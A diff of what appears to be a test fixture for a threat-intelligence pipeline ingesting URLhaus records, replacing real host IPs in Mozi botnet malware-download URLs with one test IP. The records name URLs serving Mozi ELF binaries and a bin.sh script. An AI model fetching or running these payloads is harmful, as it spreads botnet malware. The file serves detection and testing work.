+ "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://89.160.20.156:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24385,18 +24385,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.192.226.243:34452/Mozi.m",
+ "original": "http://89.160.20.156:34452/Mozi.m",
 "scheme": "http",
 "port": 34452,
- "domain": "117.192.226.243",
- "full": "http://117.192.226.243:34452/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34452/Mozi.m"
 },
- "ip": "117.192.226.243"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694381953Z",
- "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://117.192.226.243:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.192.226.243\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028197600Z",
+ "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://89.160.20.156:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24434,18 +24434,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://119.123.223.174:33017/Mozi.m",
+ "original": "http://89.160.20.156:33017/Mozi.m",
 "scheme": "http",
 "port": 33017,
- "domain": "119.123.223.174",
- "full": "http://119.123.223.174:33017/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33017/Mozi.m"
 },
- "ip": "119.123.223.174"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694385550Z",
- "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://119.123.223.174:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"119.123.223.174\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028205200Z",
+ "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://89.160.20.156:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24483,18 +24483,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.58.133.223:55061/Mozi.m",
+ "original": "http://89.160.20.156:55061/Mozi.m",
 "scheme": "http",
 "port": 55061,
- "domain": "115.58.133.223",
- "full": "http://115.58.133.223:55061/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:55061/Mozi.m"
 },
- "ip": "115.58.133.223"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694389237Z",
- "original": "{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://115.58.133.223:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.133.223\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028212200Z",
+ "original": "{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://89.160.20.156:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24532,18 +24532,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.63.36.66:50046/Mozi.m",
+ "original": "http://89.160.20.156:50046/Mozi.m",
 "scheme": "http",
 "port": 50046,
- "domain": "115.63.36.66",
- "full": "http://115.63.36.66:50046/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50046/Mozi.m"
 },
- "ip": "115.63.36.66"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694392853Z",
- "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://115.63.36.66:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.36.66\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028219100Z",
+ "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://89.160.20.156:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24581,18 +24581,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://115.56.133.53:51960/Mozi.a",
+ "original": "http://89.160.20.156:51960/Mozi.a",
 "scheme": "http",
 "port": 51960,
- "domain": "115.56.133.53",
- "full": "http://115.56.133.53:51960/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51960/Mozi.a"
 },
- "ip": "115.56.133.53"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694396871Z",
- "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://115.56.133.53:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.133.53\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028225900Z",
+ "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://89.160.20.156:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -24630,18 +24630,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.203.62:42372/Mozi.m", + "original": "http://89.160.20.156:42372/Mozi.m", "scheme": "http", "port": 42372, - "domain": "117.247.203.62", - "full": "http://117.247.203.62:42372/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42372/Mozi.m" }, - "ip": "117.247.203.62" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694400468Z", - "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://117.247.203.62:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.203.62\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028233Z", + "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://89.160.20.156:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24679,18 +24679,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.88.211.251:51592/Mozi.m", + "original": "http://89.160.20.156:51592/Mozi.m", "scheme": "http", "port": 51592, - "domain": "113.88.211.251", - "full": "http://113.88.211.251:51592/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51592/Mozi.m" }, - "ip": "113.88.211.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694404806Z", - "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://113.88.211.251:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.88.211.251\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028239800Z", + "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://89.160.20.156:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24728,18 +24728,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://103.146.233.126:35585/Mozi.a", + "original": "http://89.160.20.156:35585/Mozi.a", "scheme": "http", "port": 35585, - "domain": "103.146.233.126", - "full": "http://103.146.233.126:35585/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35585/Mozi.a" }, - "ip": "103.146.233.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694408493Z", - "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://103.146.233.126:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"103.146.233.126\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028246700Z", + "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://89.160.20.156:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24777,18 +24777,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.51.91.178:38398/Mozi.m", + "original": "http://89.160.20.156:38398/Mozi.m", "scheme": "http", "port": 38398, - "domain": "115.51.91.178", - "full": "http://115.51.91.178:38398/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38398/Mozi.m" }, - "ip": "115.51.91.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694412500Z", - "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://115.51.91.178:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.51.91.178\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028255700Z", + "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://89.160.20.156:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24826,18 +24826,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.60.104:59880/Mozi.m", + "original": "http://89.160.20.156:59880/Mozi.m", "scheme": "http", "port": 59880, - "domain": "115.55.60.104", - "full": "http://115.55.60.104:59880/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59880/Mozi.m" }, - "ip": "115.55.60.104" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694416217Z", - "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://115.55.60.104:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.60.104\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028263300Z", + "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://89.160.20.156:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24875,18 +24875,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://113.92.158.127:39138/Mozi.a", + "original": "http://89.160.20.156:39138/Mozi.a", "scheme": "http", "port": 39138, - "domain": "113.92.158.127", - "full": "http://113.92.158.127:39138/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39138/Mozi.a" }, - "ip": "113.92.158.127" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694419724Z", - "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://113.92.158.127:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.92.158.127\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028270200Z", + "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://89.160.20.156:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24925,18 +24925,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://221.15.254.11:51095/bin.sh", + "original": "http://89.160.20.156:51095/bin.sh", "scheme": "http", "port": 51095, - "domain": "221.15.254.11", - "full": "http://221.15.254.11:51095/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51095/bin.sh" }, - "ip": "221.15.254.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694423220Z", - "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://221.15.254.11:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"221.15.254.11\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028277200Z", + "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://89.160.20.156:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -24974,18 +24974,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.56.31.76:45117/i", + "original": "http://89.160.20.156:45117/i", "scheme": "http", "port": 45117, - "domain": "115.56.31.76", - "full": "http://115.56.31.76:45117/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45117/i" }, - "ip": "115.56.31.76" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694426917Z", - "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://115.56.31.76:45117/i\",\"url_status\":\"online\",\"host\":\"115.56.31.76\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028284200Z", + "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://89.160.20.156:45117/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25023,18 +25023,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.13.193.79:50204/Mozi.m", + "original": "http://89.160.20.156:50204/Mozi.m", "scheme": "http", "port": 50204, - "domain": "59.13.193.79", - "full": "http://59.13.193.79:50204/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50204/Mozi.m" }, - "ip": "59.13.193.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694430855Z", - "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://59.13.193.79:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.13.193.79\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028291200Z", + "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://89.160.20.156:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25072,18 +25072,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.18.69:45079/Mozi.m", + "original": "http://89.160.20.156:45079/Mozi.m", "scheme": "http", "port": 45079, - "domain": "59.93.18.69", - "full": "http://59.93.18.69:45079/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45079/Mozi.m" }, - "ip": "59.93.18.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694434401Z", - "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://59.93.18.69:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.18.69\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028299Z", + "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://89.160.20.156:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25121,18 +25121,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.136.43:52238/Mozi.m", + "original": "http://89.160.20.156:52238/Mozi.m", "scheme": "http", "port": 52238, - "domain": "59.99.136.43", - "full": "http://59.99.136.43:52238/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52238/Mozi.m" }, - "ip": "59.99.136.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694437758Z", - "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://59.99.136.43:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.43\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028306100Z", + "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://89.160.20.156:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25170,18 +25170,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.66.23:40312/Mozi.m", + "original": "http://89.160.20.156:40312/Mozi.m", "scheme": "http", "port": 40312, - "domain": "42.230.66.23", - "full": "http://42.230.66.23:40312/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40312/Mozi.m" }, - "ip": "42.230.66.23" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694441184Z", - "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://42.230.66.23:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.66.23\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028313Z", + "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://89.160.20.156:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25219,18 +25219,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.97.169.179:39002/Mozi.a", + "original": "http://89.160.20.156:39002/Mozi.a", "scheme": "http", "port": 39002, - "domain": "59.97.169.179", - "full": "http://59.97.169.179:39002/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39002/Mozi.a" }, - "ip": "59.97.169.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694444410Z", - "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://59.97.169.179:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.97.169.179\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028319900Z", + "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://89.160.20.156:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
